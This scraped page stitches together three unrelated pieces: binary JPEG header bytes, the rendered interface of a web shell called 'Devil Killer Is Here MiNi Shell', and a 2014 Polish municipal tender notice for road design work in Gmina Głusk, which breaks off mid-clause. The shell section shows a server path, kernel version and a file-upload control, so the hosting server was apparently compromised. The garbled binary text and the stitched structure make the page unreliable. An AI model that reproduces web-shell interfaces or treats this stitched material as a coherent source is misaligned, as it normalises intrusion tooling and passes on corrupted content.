JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140324/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140324/97754-N-2014.html

<p class="kh_header"><b>Lublin: Opracowanie  kompleksowej dokumentacji projektowej (technicznej)  dla dwóch zadań  inwestycyjnych oraz opracowanie  koncepcji  rozwiązań przebudowy   dwóch  dróg na terenie gminy Głusk</b><br>
<b>Numer ogłoszenia: 97754 - 2014; data zamieszczenia: 24.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Głusk , ul. Głuska 140, 20-385 Lublin, woj. lubelskie, tel. 81 7518760, faks 81 7518650.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glusk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie  kompleksowej dokumentacji projektowej (technicznej)  dla dwóch zadań  inwestycyjnych oraz opracowanie  koncepcji  rozwiązań przebudowy   dwóch  dróg na terenie gminy Głusk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dla części I. 
Przy opracowaniu projektów  należy w szczególności uwzględnić następujący zakres :
- Przed rozpoczęciem prac Wykonawca na podstawie pomiaru ruchu i prognozy ruchu zobowiązany jest określić klasę drogi i wyznaczyć kategorię ruchu oraz przedstawić Zamawiającemu celem akceptacji.
- Opracowanie kompleksowej dokumentacji projektowej w studium projektów budowlanych i wykonawczych, umożliwiających uzyskanie decyzji o zezwoleniu na realizację inwestycji drogowej w trybie Ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych  ( Dz. U. z 2013 r. poz. 687 z późn. zm. )- dla drogi Wilczopole - Dominów.
- przygotowanie materiałów niezbędnych do przeprowadzenia  postępowania  przetargowego na wykonanie robót budowlanych , które są wymagane Ustawą Prawo Zamówień Publicznych wraz  z aktami  wykonawczymi  oraz materiałów niezbędnych do prawidłowej realizacji robót budowlanych.
Przy opracowaniu projektów w szczególności  należy uwzględnić :
- budowę lub remont istniejących przepustów ( zgodnie z analizą zlewni  wykonaną przez  Wykonawcę)
- budowę zatok autobusowych i rond nawrotowych dla autobusów miejskich ;
- przebudowę lub budowę chodników ;
- odwodnienie drogi   ( według propozycji i opracowania Wykonawcy),
- utwardzone pobocza na całym odcinku objętym projektem;
- przebudowę istniejących urządzeń obcych ( tylko w razie konieczności ) jeżeli będą one kolidowały z przebudowywanym odcinkiem drogi gminnej;
- budowę lub przebudowę  zjazdów ( w granicach pasa drogowego); 
- przebudowę skrzyżowań ( w razie konieczności ) dla połączenia z drogą wojewódzką nr 835  i drogami powiatowymi Nr 2272 L  i Nr 2107 L.
- przewidzieć ( w miarę możliwości ) poszerzenie istniejącej jezdni  na drodze gminnej nr 107112 L;
- budowę nowego wydzielonego oświetlenia drogowego przy drodze gminnej nr 107112 L w Dominowie (uzupełnienie brakującego oświetlenia na długościach  około  500 m + 200 mb ); 
-  uzupełnienie lub wykonanie oznakowania poziomego i pionowego na całych odcinkach dróg.
Zakres opracowań dla części  I obejmuje wykonanie:
a) uzyskanie map do celów projektowych w wersji analogowej ( papierowej) ;
b) projektów  budowlano -wykonawczych -   5 egz. w wersji papierowej i  1 egz. w wersji elektronicznej ( dla obu dróg oddzielnie );
c) projektów budowlano- wykonawczych - 5 egz. w wersji papierowej i 1 egz. w wersji elektronicznej - dla budowy oświetlenia drogowego ( uzupełnienie brakującego oświetlenia , odcinek długości około 0,7km  wzdłuż drogi gminnej nr 107112 L w Dominowie);
c) przedmiarów  robót , kosztorysów inwestorskich  - po 2 egz. w wersji papierowej i 1 egz. w edytowanej wersji elektroniczne dla 3 -ech dokumentacji ;
d) szczegółowych specyfikacji  technicznych  wykonania i odbioru robót budowlanych ( SSTWiORB) - po  1 egz. w wersji papierowej i po 1 egz. w wersji elektronicznej;
h) specyfikacji istotnych warunków zamówienia w zakresie opisu przedmiotu zamówienia dla robót budowlanych realizowanych w oparciu o opracowaną dokumentację projektową  - po 1 egz. w wersji papierowej i po 1 egz. w edytowanej wersji elektronicznej;
i) projektów   stałej  organizacji ruchu ( dla drogi Wilczopole - Dominów )  i zmiany w zatwierdzonym projekcie organizacji ruchu dla drogi gminnej nr 107112 L  , zatwierdzone przez zarządców dróg - po 3 egz. w wersji papierowej;
j) projektów  czasowej organizacji ruchu na czas prowadzenia robót drogowych , zatwierdzone przez zarządców dróg - po 3 egz. w wersji papierowej;
k)materiałów  niezbędnych  do uzyskania decyzji środowiskowych uwarunkowaniach , w tym kartę informacyjną przedsięwzięcia , przygotowana zgodnie z art. 3 ust. 1 pkt 5 ustawy o udostępnianiu informacji o środowisku i jego ochronie , udziale społeczeństwa  w ochronie środowiska oraz ocenach oddziaływania na środowisko - Dz.U. Nr 199 z 2008 r. poz. 1227 , z późn. zm. 
l) uzyskanie prawomocnej decyzji  o środowiskowych uwarunkowaniach realizacji przedsięwzięcia  w tym w szczególności : przygotowanie niezbędnych dokumentów w tym: karta informacyjna oraz w razie potrzeby raport oddziaływania na środowisko.
m) uzyskania pozostałych warunków technicznych: uzgodnień , przyłączenia niezbędnych mediów , odprowadzenia wód deszczowych itp.
n) opracowania projektów budowlanych poszczególnych branż  o szczegółowości  zgodnej z rozporządzeniem Ministra Infrastruktury w sprawie szczegółowego zakresu i formy projektu budowlanego;
o) badań  geotechniczne podłoża gruntowego zgodnie z załącznikiem nr 4 do Rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych , jakim powinny odpowiadać drogi publiczne i ich usytuowanie ( Dz. U. z 1999 r. Nr 43 poz. 430);
p)  uzyskanie pozwolenia wodno - prawnego ;
r) uzgodnienia projektu na drogę gminną nr 107112 L Wojewódzkim Konserwatorem Zabytków;
s) sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia ( BIOZ)
t) wykonanie wszelkich niezbędnych opracowań  ( nie wymienionych powyżej)  , których konieczność wyniknie w toku prac projektowych w tym: przewidzieć kanał technologiczny jeśli zgłoszą się zainteresowani użytkownicy.
u) przygotowanie wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej zgodnie z art. 11 d ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych  ( t.j. Dz. U. z 2008 r. Nr 193 poz. 1194 z późn. zm. ) wraz ze wszystkimi niezbędnymi     załącznikami w tym: m.in. mapy zawierające projekty podziału nieruchomości - dla drogi Wilczopole - Dominów   ( do podziału przewiduje się około 5 działek );
w ) sprawowanie nadzoru autorskiego w trakcie wykonywania robót budowlanych  realizowanych  w oparciu o sporządzone dokumentacje - przyjmuje się  około 5  pobytów w ramach nadzoru  autorskiego dla każdej z dróg.
x) ścisła współpraca  ze wszystkimi uczestnikami procesu budowlanego .
y ) wykonanie ( w razie potrzeby) dwukrotnej  aktualizacji  kosztorysu inwestorskiego w ciągu  dwóch  lat od odbioru wykonanych opracowań  ( w terminie wskazanym przez  Zamawiającego).
Zakres opracowań dla części  II ( koncepcje ) obejmuje:
 - Przed rozpoczęciem prac Wykonawca na podstawie pomiaru ruchu i prognozy ruchu zobowiązany jest określić klasę drogi i wyznaczyć kategorię ruchu oraz przedstawić Zamawiającemu celem akceptacji.
Opracowane  koncepcje  mają zawierać  : materiał graficzny  ( plan orientacyjny  , plan sytuacyjny przebiegu dróg ) ,  rozwiązania geometryczne  wraz z zagospodarowaniem  pasa drogowego tj.  profile podłużne i przekroje normalne  , rozwiązania komunikacyjne ( zatoki  autobusowe ) określać klasę drogi   i wyznaczyć kategorię ruchu .
Koncepcja ma przewidzieć (uwzględniać ) również prowadzenie w pasie drogowym mediów : sieci wodociągowej , gazowej ,teleinformatycznej ,  kanalizacji sanitarnej , oświetlenia drogowego .
2. Zaprojektowane koncepcje rozwiązań dostosować do parametrów  dróg miejskich  jako przedłużenie dróg gminnych , na podstawie informacji  z ZDiM  w Lublinie .    
Należy wykonać :
a ) projekty koncepcji  przebudowy  -   3 egz. w wersji papierowej i  1 egz. w wersji elektronicznej (dla obu dróg oddzielnie );.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.32.00.00-7, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości:  1.500,00  zł                        (słownie:  jeden tysiąc  pięćset złotych 00/100),   w tym:
Część  1  - w wysokości  1.000,00 zł ( słownie : jeden tysiąc złotych 00/100 )
Część  2 - w wysokości  500,00 zł  ( słownie : pięćset złotych 00/100 )
W przypadku składania oferty na  obie  części oferta musi być zabezpieczona wadium w wysokości sumy wadiów na poszczególne części. 
Termin wniesienia wadium upływa dnia  03.04.2014 r. o godz.  10 00.
 Wadium musi obejmować okres związania ofertą,30 dni tj. do dnia 02.05.2014 r.
O uznaniu przez zamawiającego, że wadium w pieniądzu wniesiono w wymaganym terminie, decyduje data wpływu środków na rachunek zamawiającego.
Wadium może być wnoszone:
-  w pieniądzu, przelewem na rachunek bankowy Zamawiającego  nr :  
24 8689 0007 0000 3580 2000 0060 lub w formach wymienionych w art. 45 ust 6 pkt. 2-5 ustawy Pzp. 
 Do oferty należy dołączyć dokument potwierdzający wniesienie wadium lub jego poświadczoną kopię.
- w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- w gwarancjach bankowych,
- w gwarancjach ubezpieczeniowych,
- w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.).
W przypadku gwarancji bankowej lub ubezpieczeniowej niezbędnym jest przedłożenie pisemnej bezwarunkowej gwarancji udzielonej przez bank lub firmę ubezpieczeniową (oświadczenie), zgodnie z wymaganiami określonymi przez prawo bankowe. 
W przypadku poręczenia niezbędnym jest złożenie przez poręczyciela oświadczenia pisemnego wobec wierzyciela. 
Złożone poręczenie gwarancja musi zawierać: 
termin obowiązywania gwarancji/poręczenia do końca okresu związania ofertą,
informację, że udzielona gwarancja poręczenie stanowi zabezpieczenie na wadium na rzecz zamawiającego,
zobowiązanie zgodne z art. 46 ust. 5 ustawy - Prawo zamówień publicznych:
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienia Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełnienia warunku na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Pzp. , załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się doświadczeniem   w wykonaniu   w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,   co najmniej  dwóch  kompletnych dokumentacji projektowych na budowę lub przebudowę dróg         o wartości nie mniejszej niż 10.000 zł  brutto każda i 1 dokumentacji na oświetlenie drogowe o wartości nie mniejszej  niż  5.000 zł  (załącznik nr 6 ) w zakresie niezbędnym  do wykazania spełnienia  warunku wiedzy i doświadczenia   wraz z dokumentami potwierdzającymi, że te  usługi zostały wykonane lub są wykonywane należycie. Należy podać  ich wartość , przedmiot , daty wykonania  i podmioty na rzecz których usługi zostały wykonane z załączeniem dowodów;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienia Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełnienia warunku na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Pzp. , załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca musi wykazać dysponowanie  osobami ( załącznik nr 4 )  które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi   uprawnienia  do projektowania   w specjalności  drogowej  - minimum  1 osoba oraz  w specjalności  elektrycznej  - minimum 1 osoba  wraz z informacją na temat ich kwalifikacji zawodowych , doświadczenia i wykształcenia  niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności  oraz informacją o podstawie do dysponowania  tymi osobami.
- Wykonawca składający ofertę zobowiązany jest złożyć oświadczenie ( załącznik nr  5 do SIWZ ) że osoby , które będą uczestniczyć w wykonanie zamówienia, posiadają wymagane uprawnienia, jeśli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej  100.000 zł; 
3. Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia, warunki określone w pkt 6.1, mogą spełniać łącznie. (Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia warunki określone w pkt 1 mogą spełniać łącznie, z zastrzeżeniem posiadania uprawnień.) Żaden z wykonawców nie może podlegać wykluczeniu na podstawie art. 24 ust. 1 ustawy.
4. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- formularz OFERTA  wg wzoru zamawiającego o treści odpowiadającej załącznikowi  nr 1 wraz z      wyceną oferty wg załącznika nr 1a do siwz;
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia,  wykonawcy składają jeden formularz OFERTA.
- pełnomocnictwo , zgodnie z art.23 ust.2 ustawy pzp, w przypadku składania oferty przez  
  wykonawców ubiegających się wspólnie o udzielenie zamówienia;
- dowód zapłaty wadium;
- zaakceptowany wzór umowy wg wzoru zamawiającego o treści odpowiadającej  załącznikowi nr 7.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zmiana stawki i kwoty podatku VAT , a tym samym wynagrodzenia brutto określonego w § 8 zapisów umownych. Stawka i kwota podatku VAT oraz wynagrodzenie brutto ulegną zmianie odpowiednio do przepisów prawa wprowadzających zmianę stawki podatku VAT.
2) Terminów wykonania robót w przypadku:
a) gdy pozyskanie warunków technicznych i wszelkich uzgodnień branżowych projektu przez Zamawiającego , użytkowników i właścicieli infrastruktury technicznej wydłuży się ponad okres 1 miesiąca liczony od daty złożenia wniosku o warunki techniczne do projektowania lub daty złożenia dokumentacji projektowej do uzgodnienia - o okres 1 miesiąca liczony od daty złożenia wniosku o warunki techniczne lub od daty złożenia dokumentacji projektowej do uzgodnienia , do czasu ich otrzymania lub uzgodnienia.
b) realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy , wymuszającej konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań - o okres niezbędny do wykonania prac powiązanych z przedmiotem niniejszej umowy , realizowanych w drodze odrębnej umowy .
c) działania siły wyższej , uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie - o czas działania siły wyższej  oraz czas potrzebny do usunięcia skutków tego działania.
d) konieczności zmniejszenia zakresu przedmiotu zamówienia , gdy jego wykonanie w pierwotnym zakresie nie leży w interesie Zamawiającego - o czas proporcjonalny do zmienionego zakresu.
e) konieczności uzyskania decyzji lub uzgodnień, mogących spowodować wstrzymanie robót - o cza niezbędny do uzyskania wymaganych decyzji bądź uzgodnień,
f) konieczności wykonania dodatkowych badań i ekspertyz - o czas niezbędny do ich wykonania .
g) w przypadku zmiany przewidzianych w SIWZ ilości działek do podziału geodezyjnego , zmiana ta będzie polegała na zwiększeniu lub zmniejszeniu tych ilości , co może spowodować zmianę terminu realizacji lub zmianę wysokości wynagrodzenia. 
3. Personelu wskazanego w ofercie Wykonawcy :
